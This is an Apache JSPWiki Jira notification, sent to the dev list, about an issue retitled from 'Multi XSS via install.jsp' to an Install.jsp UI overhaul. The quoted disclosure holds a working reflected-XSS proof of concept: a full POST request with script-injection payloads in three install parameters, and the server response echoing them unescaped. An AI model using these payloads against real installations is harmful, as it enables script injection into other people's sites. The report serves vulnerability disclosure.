Posted to dev@jspwiki.apache.org by "Juan Pablo Santos Rodríguez (Jira)" <ji...@apache.org> on 2021/09/23 09:23:00 UTC

[jira] [Updated] (JSPWIKI-1138) Install.jsp UI overhaul

     [ https://issues.apache.org/jira/browse/JSPWIKI-1138?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Juan Pablo Santos Rodríguez updated JSPWIKI-1138:
-------------------------------------------------
         Flags:   (was: Important)
    Issue Type: Task  (was: Bug)
        Labels:   (was: XSS)
      Security:     (was: Security Vulnerability Disclosure)
       Summary: Install.jsp UI overhaul  (was: Multi XSS via install.jsp)

Per previous comment, editing this issue to keep it as a UI overhaul.

> Install.jsp UI overhaul
> -----------------------
>
>                 Key: JSPWIKI-1138
>                 URL: https://issues.apache.org/jira/browse/JSPWIKI-1138
>             Project: JSPWiki
>          Issue Type: Task
>          Components: Core & storage
>    Affects Versions: 2.11.0-M8
>         Environment: Windows new version
> Firefox version 84.0.1
>  
>            Reporter: Nguyen Dang Khai
>            Priority: Major
>         Attachments: xsswiki.PNG
>
>
> In function *install.jsp* there exist multiple XSS in the parameters *jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir, jspwiki.workDir*. The parameters are not sanitized via method *getContentEncoding*().
>  * Request :
> {code:java}
> // POST /wiki_jsp_war/Install.jsp HTTP/1.1
> Host: localhost:8080
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 248
> Origin: http://localhost:8080
> Connection: close
> Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
> Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE
> Upgrade-Insecure-Requests: 1
>
> jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
> {code}
>  * Response:
> {code:java}
> // HTTP/1.1 200 
> Pragma: no-cache
> Expires: -1
> Cache-Control: no-cache
> Content-Type: text/html;charset=UTF-8
> Content-Language: en-US
> Date: Wed, 23 Dec 2020 10:33:46 GMT
> Connection: close
> Content-Length: 4403
>
> <?xml version="1.0" encoding="UTF-8"?>
> ...
> </div><div class="formcontainer"><form action="Install.jsp" method="post">  <!-- Page directory -->
>   <h3>Basics</h3>    <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       What should your wiki be called?  Try to use a relative short name.</div>    <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div>
>   <h3>Security</h3>    <label class="control-label" >Administrator account</label>
>       <p>Enabled</p>
>       <div class="description">
>         This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div>
>     <h3>Advanced Settings</h3>    <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
>     </label>
>     <div class="help-block">
>       This is the place where all caches and other runtime stuff is stored.</div>
>     <p class="help-block">
>       After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p>
>     <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr />
>     <h3>Here is your new jspwiki-custom.properties</h3>
>        <pre>jspwiki.applicationName = '"><script>alert(1)</script>
> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
> jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
> jspwiki.pageProvider = VersioningFileProvider
> </pre>
>    <!-- We're done... -->
> </div>
> </div>
> </div>
> </body>
> </html>
> {code}



--
This message was sent by Atlassian Jira
(v8.3.4#803005)